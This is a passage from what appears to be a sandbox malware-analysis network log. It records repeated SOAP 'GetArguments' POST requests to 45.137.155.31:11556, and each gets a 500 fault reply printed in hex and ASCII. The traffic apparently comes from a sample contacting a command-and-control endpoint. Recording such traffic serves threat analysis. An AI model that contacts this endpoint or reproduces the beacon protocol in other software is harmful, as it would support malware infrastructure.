                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:02.058590889 CEST1306OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:02.145145893 CEST2047INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:02.219572067 CEST2048INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:01 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:03.229676962 CEST4799OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:03.299985886 CEST4821INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:03.370943069 CEST4822INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:03 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:04.385783911 CEST4822OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:04.455791950 CEST4822INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:04.526737928 CEST4823INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:04 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:05.541631937 CEST5745OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:05.611464024 CEST5745INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:05.681380987 CEST5747INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:05 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:06.698107004 CEST5747OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:06.767100096 CEST5747INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:06.839437008 CEST5748INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:06 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:07.854629040 CEST8976OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:07.924712896 CEST8976INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:08.008780003 CEST9216INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:07 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 